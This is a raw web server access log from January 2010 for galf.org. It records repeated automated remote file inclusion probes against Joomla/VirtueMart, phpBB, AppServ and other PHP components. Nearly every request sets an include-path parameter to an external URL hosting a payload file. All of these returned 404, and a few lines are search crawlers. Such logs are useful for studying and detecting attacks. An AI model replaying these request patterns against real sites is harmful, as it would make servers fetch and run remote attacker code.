222.122.161.125 - - [17/Jan/2010:17:45:42 -0800] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.122.161.125 - - [17/Jan/2010:17:45:50 -0800] "GET /logs//index.php?page=shop.product_details&flypage=shop.flypage&product_id=76&option=com_phpshop&Itemid=1/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.161.125 - - [17/Jan/2010:17:45:50 -0800] "GET /index.php?page=shop.product_details&flypage=shop.flypage&product_id=76&option=com_phpshop&Itemid=1/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.161.125 - - [17/Jan/2010:17:45:50 -0800] "GET /logs/access_091102.log//index.php?page=shop.product_details&flypage=shop.flypage&product_id=76&option=com_phpshop&Itemid=1/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.250.252.242 - - [17/Jan/2010:17:45:58 -0800] "GET /logs/access_090727.log HTTP/1.1" 200 5508747 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:17:46:51 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.fussball-brieselang.de//administrator/components/com_admin/tmpl/1txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:17:46:51 -0800] "GET /appserv/main.php?appserv_root=http://www.fussball-brieselang.de//administrator/components/com_admin/tmpl/1txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:17:46:52 -0800] "GET /logs/access_090706.log%20%20//appserv/main.php?appserv_root=http://www.fussball-brieselang.de//administrator/components/com_admin/tmpl/1txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:17:46:56 -0800] "GET /appserv/main.php?appserv_root=http://www.fussball-brieselang.de//administrator/components/com_admin/tmpl/1txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:17:46:56 -0800] "GET /logs/access_090706.log%20%20//appserv/main.php?appserv_root=http://www.fussball-brieselang.de//administrator/components/com_admin/tmpl/1txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:17:46:56 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.fussball-brieselang.de//administrator/components/com_admin/tmpl/1txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.6.189.153 - - [17/Jan/2010:17:51:09 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
71.6.189.153 - - [17/Jan/2010:17:51:09 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:17:51:32 -0800] "GET /logs/access_090706.log//appserv/main.php?appserv_root=http://www.fussball-brieselang.de//administrator/components/com_admin/tmpl/1txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:17:51:38 -0800] "GET /modules/Forums/admin/index.php?phpbb_root_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:17:51:38 -0800] "GET /logs//modules/Forums/admin/index.php?phpbb_root_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:17:51:39 -0800] "GET /logs/access_090727.log%20%20//modules/Forums/admin/index.php?phpbb_root_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:17:51:48 -0800] "GET /logs/access_091102.log//appserv/main.php?appserv_root=http://www.fussball-brieselang.de//administrator/components/com_admin/tmpl/1txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:17:52:16 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:17:52:16 -0800] "GET /logs/access_091012.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:17:52:16 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:17:52:16 -0800] "GET /logs/access_090706.log//appserv/main.php?appserv_root=http://www.fussball-brieselang.de//administrator/components/com_admin/tmpl/1txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:17:52:28 -0800] "GET /logs/access_091102.log//appserv/main.php?appserv_root=http://www.fussball-brieselang.de//administrator/components/com_admin/tmpl/1txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.6.189.153 - - [17/Jan/2010:17:53:17 -0800] "GET /logs/access_090817.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
71.6.189.153 - - [17/Jan/2010:17:53:17 -0800] "GET /logs/access_090727.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
71.6.189.153 - - [17/Jan/2010:17:53:18 -0800] "GET /logs/access_091012.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
65.55.106.180 - - [17/Jan/2010:17:54:08 -0800] "GET /logs/access_100104.log HTTP/1.1" 200 5219277 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:17:54:31 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.149.85.32 - - [17/Jan/2010:17:54:31 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.149.85.32 - - [17/Jan/2010:17:54:32 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
71.6.189.153 - - [17/Jan/2010:17:54:32 -0800] "GET /logs/access_100111.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:17:55:01 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.149.85.32 - - [17/Jan/2010:17:55:02 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.149.85.32 - - [17/Jan/2010:17:55:02 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.175.68.18 - - [17/Jan/2010:17:55:21 -0800] "GET /components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:55:21 -0800] "GET /logs/access.log%20%20//components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:55:21 -0800] "GET /logs//components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:17:55:25 -0800] "GET /logs//modules/Forums/admin/index.php?phpbb_root_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:17:55:25 -0800] "GET /logs/access_090727.log%20%20//modules/Forums/admin/index.php?phpbb_root_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:17:55:25 -0800] "GET /modules/Forums/admin/index.php?phpbb_root_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:55:25 -0800] "GET /logs//components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:55:25 -0800] "GET /logs/access.log//components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:55:25 -0800] "GET /components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:17:55:29 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.149.85.32 - - [17/Jan/2010:17:55:29 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.149.85.32 - - [17/Jan/2010:17:55:29 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
71.6.189.153 - - [17/Jan/2010:17:55:35 -0800] "GET /logs/access_090713.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:55:43 -0800] "GET /components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:55:43 -0800] "GET /logs/access.log//components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:55:43 -0800] "GET /logs//components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.6.189.153 - - [17/Jan/2010:17:56:37 -0800] "GET /logs/access_091207.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
71.6.189.153 - - [17/Jan/2010:17:56:50 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
71.6.189.153 - - [17/Jan/2010:17:56:50 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
71.6.189.153 - - [17/Jan/2010:17:56:50 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
71.6.189.153 - - [17/Jan/2010:17:56:51 -0800] "GET /logs/access_090928.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
71.6.189.153 - - [17/Jan/2010:17:56:51 -0800] "GET /logs/access_091005.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:57:01 -0800] "GET /logs//components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:57:01 -0800] "GET /components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:57:01 -0800] "GET /logs/access.log//components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.111.176.66 - - [17/Jan/2010:18:00:11 -0800] "GET /logs/access.log//components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.111.176.66 - - [17/Jan/2010:18:00:11 -0800] "GET /components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.111.176.66 - - [17/Jan/2010:18:00:11 -0800] "GET /logs//components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.6.189.153 - - [17/Jan/2010:18:02:24 -0800] "GET /logs/access_091109.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
71.6.189.153 - - [17/Jan/2010:18:03:09 -0800] "GET /logs/access_091019.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:18:03:38 -0800] "GET /logs/access.log%20%20//modules/Forums/admin/index.php?phpbb_root_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.45.123.132 - - [17/Jan/2010:18:03:38 -0800] "GET /logs/access_091221.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
201.45.123.132 - - [17/Jan/2010:18:03:38 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
201.45.123.132 - - [17/Jan/2010:18:03:39 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
110.45.136.177 - - [17/Jan/2010:18:04:07 -0800] "GET /phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.136.177 - - [17/Jan/2010:18:04:07 -0800] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.136.177 - - [17/Jan/2010:18:04:07 -0800] "GET /logs/access.log//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.93.208.12 - - [17/Jan/2010:18:04:18 -0800] "GET /phpopenchat/contrib/yabbse/poc.php?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:18:04:53 -0800] "GET /logs/access.log%20%20//modules/Forums/admin/index.php?phpbb_root_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.93.208.12 - - [17/Jan/2010:18:05:34 -0800] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.93.208.12 - - [17/Jan/2010:18:05:34 -0800] "GET /logs/access.log//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.6.189.153 - - [17/Jan/2010:18:05:46 -0800] "GET /logs/access_090831.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:18:05:57 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.16.230.82 - - [17/Jan/2010:18:05:57 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.16.230.82 - - [17/Jan/2010:18:05:57 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
201.45.123.132 - - [17/Jan/2010:18:06:01 -0800] "GET /logs/access_090817.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
201.45.123.132 - - [17/Jan/2010:18:06:02 -0800] "GET /logs/access_090727.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
201.45.123.132 - - [17/Jan/2010:18:06:05 -0800] "GET /logs/access_091012.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:18:06:11 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.16.230.82 - - [17/Jan/2010:18:06:11 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.16.230.82 - - [17/Jan/2010:18:06:11 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.210.38.8 - - [17/Jan/2010:18:06:27 -0800] "GET /logs/access_091207.log//setup.php?setup[use_category]=1&dir=http://www.noin9191.com/ams/ammember/fx29id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.210.38.8 - - [17/Jan/2010:18:06:28 -0800] "GET /logs//setup.php?setup[use_category]=1&dir=http://www.noin9191.com/ams/ammember/fx29id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.210.38.8 - - [17/Jan/2010:18:06:28 -0800] "GET /setup.php?setup[use_category]=1&dir=http://www.noin9191.com/ams/ammember/fx29id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.210.38.8 - - [17/Jan/2010:18:06:54 -0800] "GET /setup.php?setup[use_category]=1&dir=http://www.noin9191.com/ams/ammember/fx29id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.210.38.8 - - [17/Jan/2010:18:06:54 -0800] "GET /logs//setup.php?setup[use_category]=1&dir=http://www.noin9191.com/ams/ammember/fx29id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.210.38.8 - - [17/Jan/2010:18:06:56 -0800] "GET /logs/access_091207.log//setup.php?setup[use_category]=1&dir=http://www.noin9191.com/ams/ammember/fx29id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.19.247.188 - - [17/Jan/2010:18:07:22 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.19.247.188 - - [17/Jan/2010:18:07:22 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.19.247.188 - - [17/Jan/2010:18:07:22 -0800] "GET /logs/access_090803.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.19.247.188 - - [17/Jan/2010:18:07:28 -0800] "GET /logs/access_090831.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.19.247.188 - - [17/Jan/2010:18:07:58 -0800] "GET /logs/access_090803.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.19.247.188 - - [17/Jan/2010:18:07:58 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.19.247.188 - - [17/Jan/2010:18:07:58 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.45.123.132 - - [17/Jan/2010:18:08:26 -0800] "GET /logs/access_100111.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
61.19.247.188 - - [17/Jan/2010:18:08:32 -0800] "GET /logs/access_090921.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.19.247.188 - - [17/Jan/2010:18:08:32 -0800] "GET /logs/access_090831.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.45.123.132 - - [17/Jan/2010:18:09:06 -0800] "GET /logs/access_090713.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
71.6.189.153 - - [17/Jan/2010:18:09:19 -0800] "GET /logs/access_091116.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
188.93.208.12 - - [17/Jan/2010:18:09:36 -0800] "GET /logs/access_090720.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.93.208.12 - - [17/Jan/2010:18:09:36 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.93.208.12 - - [17/Jan/2010:18:09:36 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.93.208.12 - - [17/Jan/2010:18:10:17 -0800] "GET /logs/access_090706.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:18:11:04 -0800] "GET /bbshop/shop/main.php?_shop_path=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:18:11:04 -0800] "GET /logs//bbshop/shop/main.php?_shop_path=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:18:11:04 -0800] "GET /logs/access.log//bbshop/shop/main.php?_shop_path=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.45.123.132 - - [17/Jan/2010:18:11:14 -0800] "GET /logs/access_091207.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:18:11:18 -0800] "GET /bbshop/shop/main.php?_shop_path=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:18:11:22 -0800] "GET /logs//bbshop/shop/main.php?_shop_path=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:18:11:22 -0800] "GET /logs/access.log%20%20//bbshop/shop/main.php?_shop_path=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.45.123.132 - - [17/Jan/2010:18:11:26 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
201.45.123.132 - - [17/Jan/2010:18:11:28 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
